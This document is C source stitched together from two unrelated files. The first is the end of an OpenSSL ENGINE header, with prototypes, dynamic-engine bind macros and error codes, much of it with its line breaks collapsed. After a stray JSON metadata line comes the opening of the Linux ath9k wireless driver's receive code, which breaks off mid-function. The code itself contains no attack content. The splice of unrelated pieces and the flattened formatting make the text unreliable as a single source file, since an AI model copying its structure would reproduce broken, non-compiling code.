CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func); int ENGINE_set_ex_data(ENGINE *e, int idx, void *arg); void *ENGINE_get_ex_data(const ENGINE *e, int idx); /* * This function cleans up anything that needs it. Eg. 
the ENGINE_add() * function automatically ensures the list cleanup function is registered to * be called from ENGINE_cleanup(). Similarly, all ENGINE_register_*** * functions ensure ENGINE_cleanup() will clean up after them. */ void ENGINE_cleanup(void); /* * These return values from within the ENGINE structure. These can be useful * with functional references as well as structural references - it depends * which you obtained. Using the result for functional purposes if you only * obtained a structural reference may be problematic! */ const char *ENGINE_get_id(const ENGINE *e); const char *ENGINE_get_name(const ENGINE *e); const RSA_METHOD *ENGINE_get_RSA(const ENGINE *e); const DSA_METHOD *ENGINE_get_DSA(const ENGINE *e); const ECDH_METHOD *ENGINE_get_ECDH(const ENGINE *e); const ECDSA_METHOD *ENGINE_get_ECDSA(const ENGINE *e); const DH_METHOD *ENGINE_get_DH(const ENGINE *e); const RAND_METHOD *ENGINE_get_RAND(const ENGINE *e); const STORE_METHOD *ENGINE_get_STORE(const ENGINE *e); ENGINE_GEN_INT_FUNC_PTR ENGINE_get_destroy_function(const ENGINE *e); ENGINE_GEN_INT_FUNC_PTR ENGINE_get_init_function(const ENGINE *e); ENGINE_GEN_INT_FUNC_PTR ENGINE_get_finish_function(const ENGINE *e); ENGINE_CTRL_FUNC_PTR ENGINE_get_ctrl_function(const ENGINE *e); ENGINE_LOAD_KEY_PTR ENGINE_get_load_privkey_function(const ENGINE *e); ENGINE_LOAD_KEY_PTR ENGINE_get_load_pubkey_function(const ENGINE *e); ENGINE_SSL_CLIENT_CERT_PTR ENGINE_get_ssl_client_cert_function(const ENGINE *e); ENGINE_CIPHERS_PTR ENGINE_get_ciphers(const ENGINE *e); ENGINE_DIGESTS_PTR ENGINE_get_digests(const ENGINE *e); ENGINE_PKEY_METHS_PTR ENGINE_get_pkey_meths(const ENGINE *e); ENGINE_PKEY_ASN1_METHS_PTR ENGINE_get_pkey_asn1_meths(const ENGINE *e); const EVP_CIPHER *ENGINE_get_cipher(ENGINE *e, int nid); const EVP_MD *ENGINE_get_digest(ENGINE *e, int nid); const EVP_PKEY_METHOD *ENGINE_get_pkey_meth(ENGINE *e, int nid); const EVP_PKEY_ASN1_METHOD *ENGINE_get_pkey_asn1_meth(ENGINE *e, int nid); const 
EVP_PKEY_ASN1_METHOD *ENGINE_get_pkey_asn1_meth_str(ENGINE *e, const char *str, int len); const EVP_PKEY_ASN1_METHOD *ENGINE_pkey_asn1_find_str(ENGINE **pe, const char *str, int len); const ENGINE_CMD_DEFN *ENGINE_get_cmd_defns(const ENGINE *e); int ENGINE_get_flags(const ENGINE *e); /* * FUNCTIONAL functions. These functions deal with ENGINE structures that * have (or will) be initialised for use. Broadly speaking, the structural * functions are useful for iterating the list of available engine types, * creating new engine types, and other "list" operations. These functions * actually deal with ENGINEs that are to be used. As such these functions * can fail (if applicable) when particular engines are unavailable - eg. if * a hardware accelerator is not attached or not functioning correctly. Each * ENGINE has 2 reference counts; structural and functional. Every time a * functional reference is obtained or released, a corresponding structural * reference is automatically obtained or released too. */ /* * Initialise a engine type for use (or up its reference count if it's * already in use). This will fail if the engine is not currently operational * and cannot initialise. */ int ENGINE_init(ENGINE *e); /* * Free a functional reference to a engine type. This does not require a * corresponding call to ENGINE_free as it also releases a structural * reference. */ int ENGINE_finish(ENGINE *e); /* * The following functions handle keys that are stored in some secondary * location, handled by the engine. The storage may be on a card or * whatever. 
*/ EVP_PKEY *ENGINE_load_private_key(ENGINE *e, const char *key_id, UI_METHOD *ui_method, void *callback_data); EVP_PKEY *ENGINE_load_public_key(ENGINE *e, const char *key_id, UI_METHOD *ui_method, void *callback_data); int ENGINE_load_ssl_client_cert(ENGINE *e, SSL *s, STACK_OF(X509_NAME) *ca_dn, X509 **pcert, EVP_PKEY **ppkey, STACK_OF(X509) **pother, UI_METHOD *ui_method, void *callback_data); /* * This returns a pointer for the current ENGINE structure that is (by * default) performing any RSA operations. The value returned is an * incremented reference, so it should be free'd (ENGINE_finish) before it is * discarded. */ ENGINE *ENGINE_get_default_RSA(void); /* Same for the other "methods" */ ENGINE *ENGINE_get_default_DSA(void); ENGINE *ENGINE_get_default_ECDH(void); ENGINE *ENGINE_get_default_ECDSA(void); ENGINE *ENGINE_get_default_DH(void); ENGINE *ENGINE_get_default_RAND(void); /* * These functions can be used to get a functional reference to perform * ciphering or digesting corresponding to "nid". */ ENGINE *ENGINE_get_cipher_engine(int nid); ENGINE *ENGINE_get_digest_engine(int nid); ENGINE *ENGINE_get_pkey_meth_engine(int nid); ENGINE *ENGINE_get_pkey_asn1_meth_engine(int nid); /* * This sets a new default ENGINE structure for performing RSA operations. If * the result is non-zero (success) then the ENGINE structure will have had * its reference count up'd so the caller should still free their own * reference 'e'. 
*/ int ENGINE_set_default_RSA(ENGINE *e); int ENGINE_set_default_string(ENGINE *e, const char *def_list); /* Same for the other "methods" */ int ENGINE_set_default_DSA(ENGINE *e); int ENGINE_set_default_ECDH(ENGINE *e); int ENGINE_set_default_ECDSA(ENGINE *e); int ENGINE_set_default_DH(ENGINE *e); int ENGINE_set_default_RAND(ENGINE *e); int ENGINE_set_default_ciphers(ENGINE *e); int ENGINE_set_default_digests(ENGINE *e); int ENGINE_set_default_pkey_meths(ENGINE *e); int ENGINE_set_default_pkey_asn1_meths(ENGINE *e); /* * The combination "set" - the flags are bitwise "OR"d from the * ENGINE_METHOD_*** defines above. As with the "ENGINE_register_complete()" * function, this function can result in unnecessary static linkage. If your * application requires only specific functionality, consider using more * selective functions. */ int ENGINE_set_default(ENGINE *e, unsigned int flags); void ENGINE_add_conf_module(void); /* Deprecated functions ... */ /* int ENGINE_clear_defaults(void); */ /**************************/ /* DYNAMIC ENGINE SUPPORT */ /**************************/ /* Binary/behaviour compatibility levels */ # define OSSL_DYNAMIC_VERSION (unsigned long)0x00020000 /* * Binary versions older than this are too old for us (whether we're a loader * or a loadee) */ # define OSSL_DYNAMIC_OLDEST (unsigned long)0x00020000 /* * When compiling an ENGINE entirely as an external shared library, loadable * by the "dynamic" ENGINE, these types are needed. The 'dynamic_fns' * structure type provides the calling application's (or library's) error * functionality and memory management function pointers to the loaded * library. These should be used/set in the loaded library code so that the * loading application's 'state' will be used/changed in all operations. The * 'static_state' pointer allows the loaded library to know if it shares the * same static data as the calling application (or library), and thus whether * these callbacks need to be set or not. 
 */
/* Memory-management callback types, mirroring CRYPTO_set_mem_functions() */
typedef void *(*dyn_MEM_malloc_cb) (size_t);
typedef void *(*dyn_MEM_realloc_cb) (void *, size_t);
typedef void (*dyn_MEM_free_cb) (void *);
/* The loading application's allocator, handed to the loaded ENGINE library */
typedef struct st_dynamic_MEM_fns {
    dyn_MEM_malloc_cb malloc_cb;
    dyn_MEM_realloc_cb realloc_cb;
    dyn_MEM_free_cb free_cb;
} dynamic_MEM_fns;
/*
 * FIXME: Perhaps the memory and locking code (crypto.h) should declare and
 * use these types so we (and any other dependent code) can simplify a bit??
 */
typedef void (*dyn_lock_locking_cb) (int, int, const char *, int);
typedef int (*dyn_lock_add_lock_cb) (int *, int, int, const char *, int);
typedef struct CRYPTO_dynlock_value *(*dyn_dynlock_create_cb) (const char *,
                                                               int);
typedef void (*dyn_dynlock_lock_cb) (int, struct CRYPTO_dynlock_value *,
                                     const char *, int);
typedef void (*dyn_dynlock_destroy_cb) (struct CRYPTO_dynlock_value *,
                                        const char *, int);
/* The loading application's locking callbacks, handed to the loaded library */
typedef struct st_dynamic_LOCK_fns {
    dyn_lock_locking_cb lock_locking_cb;
    dyn_lock_add_lock_cb lock_add_lock_cb;
    dyn_dynlock_create_cb dynlock_create_cb;
    dyn_dynlock_lock_cb dynlock_lock_cb;
    dyn_dynlock_destroy_cb dynlock_destroy_cb;
} dynamic_LOCK_fns;
/* The top-level structure passed to the loaded library's bind function */
typedef struct st_dynamic_fns {
    void *static_state;
    const ERR_FNS *err_fns;
    const CRYPTO_EX_DATA_IMPL *ex_data_fns;
    dynamic_MEM_fns mem_fns;
    dynamic_LOCK_fns lock_fns;
} dynamic_fns;
/*
 * The version checking function should be of this prototype. NB: The
 * ossl_version value passed in is the OSSL_DYNAMIC_VERSION of the loading
 * code. If this function returns zero, it indicates a (potential) version
 * incompatibility and the loaded library doesn't believe it can proceed.
 * Otherwise, the returned value is the (latest) version supported by the
 * loading library. The loader may still decide that the loaded code's
 * version is unsatisfactory and could veto the load. The function is
 * expected to be implemented with the symbol name "v_check", and a default
 * implementation can be fully instantiated with
 * IMPLEMENT_DYNAMIC_CHECK_FN().
 */
/*
 * Prototype of the version-checking entry point a dynamically loadable
 * ENGINE must export under the symbol name "v_check".
 */
typedef unsigned long (*dynamic_v_check_fn) (unsigned long ossl_version);
/*
 * Default "v_check" implementation: accept any loader at least as new as
 * OSSL_DYNAMIC_OLDEST and report this library's own compatibility level,
 * otherwise return zero to refuse the load.
 */
# define IMPLEMENT_DYNAMIC_CHECK_FN() \
        OPENSSL_EXPORT unsigned long v_check(unsigned long v); \
        OPENSSL_EXPORT unsigned long v_check(unsigned long v) { \
                if(v >= OSSL_DYNAMIC_OLDEST) return OSSL_DYNAMIC_VERSION; \
                return 0; }
/*
 * This function is passed the ENGINE structure to initialise with its own
 * function and command settings. It should not adjust the structural or
 * functional reference counts. If this function returns zero, (a) the load
 * will be aborted, (b) the previous ENGINE state will be memcpy'd back onto
 * the structure, and (c) the shared library will be unloaded. So
 * implementations should do their own internal cleanup in failure
 * circumstances otherwise they could leak. The 'id' parameter, if non-NULL,
 * represents the ENGINE id that the loader is looking for. If this is NULL,
 * the shared library can choose to return failure or to initialise a
 * 'default' ENGINE. If non-NULL, the shared library must initialise only an
 * ENGINE matching the passed 'id'. The function is expected to be
 * implemented with the symbol name "bind_engine". A standard implementation
 * can be instantiated with IMPLEMENT_DYNAMIC_BIND_FN(fn) where the parameter
 * 'fn' is a callback function that populates the ENGINE structure and
 * returns an int value (zero for failure).
'fn' should have prototype;
 * [static] int fn(ENGINE *e, const char *id);
 */
/*
 * Prototype of the binding entry point a dynamically loadable ENGINE must
 * export under the symbol name "bind_engine".
 */
typedef int (*dynamic_bind_engine) (ENGINE *e, const char *id,
                                    const dynamic_fns *fns);
/*
 * Default "bind_engine" implementation: adopt the loader's memory, locking,
 * ex_data and error implementations (skipped when both sides already share
 * the same libcrypto static state), then delegate to 'fn' to populate the
 * ENGINE. Returns 1 on success, 0 on any failure.
 */
# define IMPLEMENT_DYNAMIC_BIND_FN(fn) \
        OPENSSL_EXPORT \
        int bind_engine(ENGINE *e, const char *id, const dynamic_fns *fns); \
        OPENSSL_EXPORT \
        int bind_engine(ENGINE *e, const char *id, const dynamic_fns *fns) { \
                if(ENGINE_get_static_state() == fns->static_state) goto skip_cbs; \
                if(!CRYPTO_set_mem_functions(fns->mem_fns.malloc_cb, \
                        fns->mem_fns.realloc_cb, fns->mem_fns.free_cb)) \
                        return 0; \
                CRYPTO_set_locking_callback(fns->lock_fns.lock_locking_cb); \
                CRYPTO_set_add_lock_callback(fns->lock_fns.lock_add_lock_cb); \
                CRYPTO_set_dynlock_create_callback(fns->lock_fns.dynlock_create_cb); \
                CRYPTO_set_dynlock_lock_callback(fns->lock_fns.dynlock_lock_cb); \
                CRYPTO_set_dynlock_destroy_callback(fns->lock_fns.dynlock_destroy_cb); \
                if(!CRYPTO_set_ex_data_implementation(fns->ex_data_fns)) \
                        return 0; \
                if(!ERR_set_implementation(fns->err_fns)) return 0; \
        skip_cbs: \
                if(!fn(e,id)) return 0; \
                return 1; }
/*
 * If the loading application (or library) and the loaded ENGINE library
 * share the same static data (eg. they're both dynamically linked to the
 * same libcrypto.so) we need a way to avoid trying to set system callbacks -
 * this would fail, and for the same reason that it's unnecessary to try. If
 * the loaded ENGINE has (or gets from through the loader) its own copy of
 * the libcrypto static data, we will need to set the callbacks. The easiest
 * way to detect this is to have a function that returns a pointer to some
 * static data and let the loading application and loaded ENGINE compare
 * their respective values.
 */
void *ENGINE_get_static_state(void);
# if defined(__OpenBSD__) || defined(__FreeBSD__) || defined(HAVE_CRYPTODEV)
void ENGINE_setup_bsd_cryptodev(void);
# endif
/* BEGIN ERROR CODES */
/*
 * The following lines are auto generated by the script mkerr.pl.
Any changes * made after this point may be overwritten when the script is next run. */ void ERR_load_ENGINE_strings(void); /* Error codes for the ENGINE functions. */ /* Function codes. */ # define ENGINE_F_DYNAMIC_CTRL 180 # define ENGINE_F_DYNAMIC_GET_DATA_CTX 181 # define ENGINE_F_DYNAMIC_LOAD 182 # define ENGINE_F_DYNAMIC_SET_DATA_CTX 183 # define ENGINE_F_ENGINE_ADD 105 # define ENGINE_F_ENGINE_BY_ID 106 # define ENGINE_F_ENGINE_CMD_IS_EXECUTABLE 170 # define ENGINE_F_ENGINE_CTRL 142 # define ENGINE_F_ENGINE_CTRL_CMD 178 # define ENGINE_F_ENGINE_CTRL_CMD_STRING 171 # define ENGINE_F_ENGINE_FINISH 107 # define ENGINE_F_ENGINE_FREE_UTIL 108 # define ENGINE_F_ENGINE_GET_CIPHER 185 # define ENGINE_F_ENGINE_GET_DEFAULT_TYPE 177 # define ENGINE_F_ENGINE_GET_DIGEST 186 # define ENGINE_F_ENGINE_GET_NEXT 115 # define ENGINE_F_ENGINE_GET_PKEY_ASN1_METH 193 # define ENGINE_F_ENGINE_GET_PKEY_METH 192 # define ENGINE_F_ENGINE_GET_PREV 116 # define ENGINE_F_ENGINE_INIT 119 # define ENGINE_F_ENGINE_LIST_ADD 120 # define ENGINE_F_ENGINE_LIST_REMOVE 121 # define ENGINE_F_ENGINE_LOAD_PRIVATE_KEY 150 # define ENGINE_F_ENGINE_LOAD_PUBLIC_KEY 151 # define ENGINE_F_ENGINE_LOAD_SSL_CLIENT_CERT 194 # define ENGINE_F_ENGINE_NEW 122 # define ENGINE_F_ENGINE_REMOVE 123 # define ENGINE_F_ENGINE_SET_DEFAULT_STRING 189 # define ENGINE_F_ENGINE_SET_DEFAULT_TYPE 126 # define ENGINE_F_ENGINE_SET_ID 129 # define ENGINE_F_ENGINE_SET_NAME 130 # define ENGINE_F_ENGINE_TABLE_REGISTER 184 # define ENGINE_F_ENGINE_UNLOAD_KEY 152 # define ENGINE_F_ENGINE_UNLOCKED_FINISH 191 # define ENGINE_F_ENGINE_UP_REF 190 # define ENGINE_F_INT_CTRL_HELPER 172 # define ENGINE_F_INT_ENGINE_CONFIGURE 188 # define ENGINE_F_INT_ENGINE_MODULE_INIT 187 # define ENGINE_F_LOG_MESSAGE 141 /* Reason codes. 
*/ # define ENGINE_R_ALREADY_LOADED 100 # define ENGINE_R_ARGUMENT_IS_NOT_A_NUMBER 133 # define ENGINE_R_CMD_NOT_EXECUTABLE 134 # define ENGINE_R_COMMAND_TAKES_INPUT 135 # define ENGINE_R_COMMAND_TAKES_NO_INPUT 136 # define ENGINE_R_CONFLICTING_ENGINE_ID 103 # define ENGINE_R_CTRL_COMMAND_NOT_IMPLEMENTED 119 # define ENGINE_R_DH_NOT_IMPLEMENTED 139 # define ENGINE_R_DSA_NOT_IMPLEMENTED 140 # define ENGINE_R_DSO_FAILURE 104 # define ENGINE_R_DSO_NOT_FOUND 132 # define ENGINE_R_ENGINES_SECTION_ERROR 148 # define ENGINE_R_ENGINE_CONFIGURATION_ERROR 102 # define ENGINE_R_ENGINE_IS_NOT_IN_LIST 105 # define ENGINE_R_ENGINE_SECTION_ERROR 149 # define ENGINE_R_FAILED_LOADING_PRIVATE_KEY 128 # define ENGINE_R_FAILED_LOADING_PUBLIC_KEY 129 # define ENGINE_R_FINISH_FAILED 106 # define ENGINE_R_GET_HANDLE_FAILED 107 # define ENGINE_R_ID_OR_NAME_MISSING 108 # define ENGINE_R_INIT_FAILED 109 # define ENGINE_R_INTERNAL_LIST_ERROR 110 # define ENGINE_R_INVALID_ARGUMENT 143 # define ENGINE_R_INVALID_CMD_NAME 137 # define ENGINE_R_INVALID_CMD_NUMBER 138 # define ENGINE_R_INVALID_INIT_VALUE 151 # define ENGINE_R_INVALID_STRING 150 # define ENGINE_R_NOT_INITIALISED 117 # define ENGINE_R_NOT_LOADED 112 # define ENGINE_R_NO_CONTROL_FUNCTION 120 # define ENGINE_R_NO_INDEX 144 # define ENGINE_R_NO_LOAD_FUNCTION 125 # define ENGINE_R_NO_REFERENCE 130 # define ENGINE_R_NO_SUCH_ENGINE 116 # define ENGINE_R_NO_UNLOAD_FUNCTION 126 # define ENGINE_R_PROVIDE_PARAMETERS 113 # define ENGINE_R_RSA_NOT_IMPLEMENTED 141 # define ENGINE_R_UNIMPLEMENTED_CIPHER 146 # define ENGINE_R_UNIMPLEMENTED_DIGEST 147 # define ENGINE_R_UNIMPLEMENTED_PUBLIC_KEY_METHOD 101 # define ENGINE_R_VERSION_INCOMPATIBILITY 145 #ifdef __cplusplus } #endif #endif
{ "language": "C" }
/*
 * Copyright (c) 2008-2011 Atheros Communications Inc.
 *
 * Permission to use, copy, modify, and/or distribute this software for any
 * purpose with or without fee is hereby granted, provided that the above
 * copyright notice and this permission notice appear in all copies.
 *
 * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
 * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
 * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
 * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
 * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
 * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
 */

#include <linux/dma-mapping.h>
#include "ath9k.h"
#include "ar9003_mac.h"

/* Stash/retrieve the owning ath_buf pointer in the skb control block
 * (used by the EDMA RX FIFO path). */
#define SKB_CB_ATHBUF(__skb)	(*((struct ath_buf **)__skb->cb))

/*
 * Decide whether the alternate antenna looks better than the main one:
 * either the alt/main ratio is high and alt RSSI beats main by maxdelta,
 * or alt RSSI beats main by at least mindelta.  A minimum packet count
 * (> 50) is required so the RSSI averages are meaningful.
 */
static inline bool ath_is_alt_ant_ratio_better(int alt_ratio, int maxdelta,
					       int mindelta, int main_rssi_avg,
					       int alt_rssi_avg, int pkt_count)
{
	return (((alt_ratio >= ATH_ANT_DIV_COMB_ALT_ANT_RATIO2) &&
		 (alt_rssi_avg > main_rssi_avg + maxdelta)) ||
		(alt_rssi_avg > main_rssi_avg + mindelta)) &&
	       (pkt_count > 50);
}

/*
 * Per-chip-family (div_group) check of whether the alternate LNA
 * configuration should be preferred over the current main one.
 * Group 0 uses a simple ratio threshold; groups 1 and 2 allow the
 * alternate to win with a small RSSI penalty when swapping LNA1/LNA2.
 */
static inline bool ath_ant_div_comb_alt_check(u8 div_group, int alt_ratio,
					      int curr_main_set,
					      int curr_alt_set,
					      int alt_rssi_avg,
					      int main_rssi_avg)
{
	bool result = false;

	switch (div_group) {
	case 0:
		if (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO)
			result = true;
		break;
	case 1:
	case 2:
		/* LNA2->LNA1 tolerates a 5 dB deficit, LNA1->LNA2 only 2 dB;
		 * in both cases the alt RSSI must be at least 4. */
		if ((((curr_main_set == ATH_ANT_DIV_COMB_LNA2) &&
		      (curr_alt_set == ATH_ANT_DIV_COMB_LNA1) &&
		      (alt_rssi_avg >= (main_rssi_avg - 5))) ||
		     ((curr_main_set == ATH_ANT_DIV_COMB_LNA1) &&
		      (curr_alt_set == ATH_ANT_DIV_COMB_LNA2) &&
		      (alt_rssi_avg >= (main_rssi_avg - 2)))) &&
		    (alt_rssi_avg >= 4))
			result = true;
		else
			result = false;
		break;
	}

	return result;
}

/* True when powersave is on and the hardware handles sleep transitions
 * itself (ATH9K_HW_CAP_AUTOSLEEP). */
static inline bool ath9k_check_auto_sleep(struct ath_softc *sc)
{
	return sc->ps_enabled &&
	       (sc->sc_ah->caps.hw_caps &
		ATH9K_HW_CAP_AUTOSLEEP);
}

/*
 * Setup and link descriptors.
 *
 * 11N: we can no longer afford to self link the last descriptor.
 * MAC acknowledges BA status as long as it copies frames to host
 * buffer (or rx fifo). This can incorrectly acknowledge packets
 * to a sender if last desc is self-linked.
 */
static void ath_rx_buf_link(struct ath_softc *sc, struct ath_buf *bf)
{
	struct ath_hw *ah = sc->sc_ah;
	struct ath_common *common = ath9k_hw_common(ah);
	struct ath_desc *ds;
	struct sk_buff *skb;

	ATH_RXBUF_RESET(bf);

	ds = bf->bf_desc;
	ds->ds_link = 0; /* link to null */
	ds->ds_data = bf->bf_buf_addr;

	/* virtual addr of the beginning of the buffer. */
	skb = bf->bf_mpdu;
	BUG_ON(skb == NULL);
	ds->ds_vdata = skb->data;

	/*
	 * setup rx descriptors. The rx_bufsize here tells the hardware
	 * how much data it can DMA to us and that we are prepared
	 * to process
	 */
	ath9k_hw_setuprxdesc(ah, ds, common->rx_bufsize, 0);

	/* First buffer goes straight to the hardware; subsequent ones are
	 * chained through the previous descriptor's link word. */
	if (sc->rx.rxlink == NULL)
		ath9k_hw_putrxbuf(ah, bf->bf_daddr);
	else
		*sc->rx.rxlink = bf->bf_daddr;

	sc->rx.rxlink = &ds->ds_link;
}

/* Program the default RX antenna and reset the diversity counters. */
static void ath_setdefantenna(struct ath_softc *sc, u32 antenna)
{
	/* XXX block beacon interrupts */
	ath9k_hw_setantenna(sc->sc_ah, antenna);
	sc->rx.defant = antenna;
	sc->rx.rxotherant = 0;
}

/* Push RX filter, BSSID mask, operating mode and multicast filter
 * settings down to the hardware. */
static void ath_opmode_init(struct ath_softc *sc)
{
	struct ath_hw *ah = sc->sc_ah;
	struct ath_common *common = ath9k_hw_common(ah);

	u32 rfilt, mfilt[2];

	/* configure rx filter */
	rfilt = ath_calcrxfilter(sc);
	ath9k_hw_setrxfilter(ah, rfilt);

	/* configure bssid mask */
	ath_hw_setbssidmask(common);

	/* configure operational mode */
	ath9k_hw_setopmode(ah);

	/* calculate and install multicast filter */
	mfilt[0] = mfilt[1] = ~0;
	ath9k_hw_setmcastfilter(ah, mfilt[0], mfilt[1]);
}

/*
 * Hand one free RX buffer from sc->rx.rxbuf to the EDMA FIFO of the
 * given queue.  Returns false when the hardware FIFO is already full.
 */
static bool ath_rx_edma_buf_link(struct ath_softc *sc,
				 enum ath9k_rx_qtype qtype)
{
	struct ath_hw *ah = sc->sc_ah;
	struct ath_rx_edma *rx_edma;
	struct sk_buff *skb;
	struct ath_buf *bf;

	rx_edma = &sc->rx.rx_edma[qtype];
	if (skb_queue_len(&rx_edma->rx_fifo) >= rx_edma->rx_fifo_hwsize)
		return false;

	bf = list_first_entry(&sc->rx.rxbuf, struct ath_buf, list);
	list_del_init(&bf->list);

	skb = bf->bf_mpdu;

	ATH_RXBUF_RESET(bf);
	/* Zero the RX status area so stale data can't be mistaken for a
	 * completed descriptor, then flush that zeroed area to the device. */
	memset(skb->data, 0, ah->caps.rx_status_len);
	dma_sync_single_for_device(sc->dev, bf->bf_buf_addr,
				   ah->caps.rx_status_len, DMA_TO_DEVICE);

	SKB_CB_ATHBUF(skb) = bf;
	ath9k_hw_addrxbuf_edma(ah, bf->bf_buf_addr, qtype);
	skb_queue_tail(&rx_edma->rx_fifo, skb);

	return true;
}

/* Fill the EDMA FIFO of a queue with buffers from the free list until
 * the FIFO is full or the free list runs out. */
static void ath_rx_addbuffer_edma(struct ath_softc *sc,
				  enum ath9k_rx_qtype qtype, int size)
{
	struct ath_common *common = ath9k_hw_common(sc->sc_ah);
	struct ath_buf *bf, *tbf;

	if (list_empty(&sc->rx.rxbuf)) {
		ath_dbg(common, QUEUE, "No free rx buf available\n");
		return;
	}

	list_for_each_entry_safe(bf, tbf, &sc->rx.rxbuf, list)
		if (!ath_rx_edma_buf_link(sc, qtype))
			break;
}

/* Drain an EDMA FIFO, returning its buffers to the free rxbuf list. */
static void ath_rx_remove_buffer(struct ath_softc *sc,
				 enum ath9k_rx_qtype qtype)
{
	struct ath_buf *bf;
	struct ath_rx_edma *rx_edma;
	struct sk_buff *skb;

	rx_edma = &sc->rx.rx_edma[qtype];

	while ((skb = skb_dequeue(&rx_edma->rx_fifo)) != NULL) {
		bf = SKB_CB_ATHBUF(skb);
		BUG_ON(!bf);
		list_add_tail(&bf->list, &sc->rx.rxbuf);
	}
}

/* Tear down all EDMA RX state: drain both FIFOs, unmap and free every
 * buffer, and release the ath_buf array. */
static void ath_rx_edma_cleanup(struct ath_softc *sc)
{
	struct ath_hw *ah = sc->sc_ah;
	struct ath_common *common = ath9k_hw_common(ah);
	struct ath_buf *bf;

	ath_rx_remove_buffer(sc, ATH9K_RX_QUEUE_LP);
	ath_rx_remove_buffer(sc, ATH9K_RX_QUEUE_HP);

	list_for_each_entry(bf, &sc->rx.rxbuf, list) {
		if (bf->bf_mpdu) {
			dma_unmap_single(sc->dev, bf->bf_buf_addr,
					common->rx_bufsize,
					DMA_BIDIRECTIONAL);
			dev_kfree_skb_any(bf->bf_mpdu);
			bf->bf_buf_addr = 0;
			bf->bf_mpdu = NULL;
		}
	}

	INIT_LIST_HEAD(&sc->rx.rxbuf);

	kfree(sc->rx.rx_bufptr);
	sc->rx.rx_bufptr = NULL;
}

/* Initialize one EDMA RX FIFO with its hardware queue depth. */
static void ath_rx_edma_init_queue(struct ath_rx_edma *rx_edma, int size)
{
	skb_queue_head_init(&rx_edma->rx_fifo);
	rx_edma->rx_fifo_hwsize = size;
}

/*
 * Allocate and DMA-map nbufs RX buffers for EDMA-capable (AR93xx-style)
 * chips and set up the LP/HP FIFOs.  On failure, everything allocated
 * so far is released via ath_rx_edma_cleanup().
 */
static int ath_rx_edma_init(struct ath_softc *sc, int nbufs)
{
	struct ath_common *common = ath9k_hw_common(sc->sc_ah);
	struct ath_hw *ah = sc->sc_ah;
	struct sk_buff *skb;
	struct
	ath_buf *bf;
	int error = 0, i;
	u32 size;

	/* Hardware DMA size excludes the status area prepended to the frame. */
	ath9k_hw_set_rx_bufsize(ah, common->rx_bufsize -
				    ah->caps.rx_status_len);

	ath_rx_edma_init_queue(&sc->rx.rx_edma[ATH9K_RX_QUEUE_LP],
			       ah->caps.rx_lp_qdepth);
	ath_rx_edma_init_queue(&sc->rx.rx_edma[ATH9K_RX_QUEUE_HP],
			       ah->caps.rx_hp_qdepth);

	size = sizeof(struct ath_buf) * nbufs;
	bf = kzalloc(size, GFP_KERNEL);
	if (!bf)
		return -ENOMEM;

	INIT_LIST_HEAD(&sc->rx.rxbuf);
	sc->rx.rx_bufptr = bf;

	for (i = 0; i < nbufs; i++, bf++) {
		skb = ath_rxbuf_alloc(common, common->rx_bufsize, GFP_KERNEL);
		if (!skb) {
			error = -ENOMEM;
			goto rx_init_fail;
		}

		memset(skb->data, 0, common->rx_bufsize);
		bf->bf_mpdu = skb;

		/* BIDIRECTIONAL: the status area is written to the device,
		 * the frame data is read back from it. */
		bf->bf_buf_addr = dma_map_single(sc->dev, skb->data,
						 common->rx_bufsize,
						 DMA_BIDIRECTIONAL);
		if (unlikely(dma_mapping_error(sc->dev,
						bf->bf_buf_addr))) {
				dev_kfree_skb_any(skb);
				bf->bf_mpdu = NULL;
				bf->bf_buf_addr = 0;
				ath_err(common,
					"dma_mapping_error() on RX init\n");
				error = -ENOMEM;
				goto rx_init_fail;
		}

		list_add_tail(&bf->list, &sc->rx.rxbuf);
	}

	return 0;

rx_init_fail:
	ath_rx_edma_cleanup(sc);
	return error;
}

/* Re-arm EDMA RX: enable RX, refill both FIFOs, reprogram the opmode
 * related registers and start the PCU receive engine. */
static void ath_edma_start_recv(struct ath_softc *sc)
{
	spin_lock_bh(&sc->rx.rxbuflock);

	ath9k_hw_rxena(sc->sc_ah);

	ath_rx_addbuffer_edma(sc, ATH9K_RX_QUEUE_HP,
			      sc->rx.rx_edma[ATH9K_RX_QUEUE_HP].rx_fifo_hwsize);

	ath_rx_addbuffer_edma(sc, ATH9K_RX_QUEUE_LP,
			      sc->rx.rx_edma[ATH9K_RX_QUEUE_LP].rx_fifo_hwsize);

	ath_opmode_init(sc);

	ath9k_hw_startpcureceive(sc->sc_ah, (sc->sc_flags & SC_OP_OFFCHANNEL));

	spin_unlock_bh(&sc->rx.rxbuflock);
}

/* Pull all buffers back out of both EDMA FIFOs. */
static void ath_edma_stop_recv(struct ath_softc *sc)
{
	ath_rx_remove_buffer(sc, ATH9K_RX_QUEUE_HP);
	ath_rx_remove_buffer(sc, ATH9K_RX_QUEUE_LP);
}

/*
 * Common RX setup entry point: allocates descriptors and buffers for
 * either the EDMA or the legacy descriptor-chain path, depending on
 * hardware capabilities.
 */
int ath_rx_init(struct ath_softc *sc, int nbufs)
{
	struct ath_common *common = ath9k_hw_common(sc->sc_ah);
	struct sk_buff *skb;
	struct ath_buf *bf;
	int error = 0;

	spin_lock_init(&sc->sc_pcu_lock);
	sc->sc_flags &= ~SC_OP_RXFLUSH;
	spin_lock_init(&sc->rx.rxbuflock);

	common->rx_bufsize = IEEE80211_MAX_MPDU_LEN / 2 +
			     sc->sc_ah->caps.rx_status_len;

	if
	    (sc->sc_ah->caps.hw_caps & ATH9K_HW_CAP_EDMA) {
		return ath_rx_edma_init(sc, nbufs);
	} else {
		ath_dbg(common, CONFIG, "cachelsz %u rxbufsize %u\n",
			common->cachelsz, common->rx_bufsize);

		/* Initialize rx descriptors */

		error = ath_descdma_setup(sc, &sc->rx.rxdma, &sc->rx.rxbuf,
				"rx", nbufs, 1, 0);
		if (error != 0) {
			ath_err(common,
				"failed to allocate rx descriptors: %d\n",
				error);
			goto err;
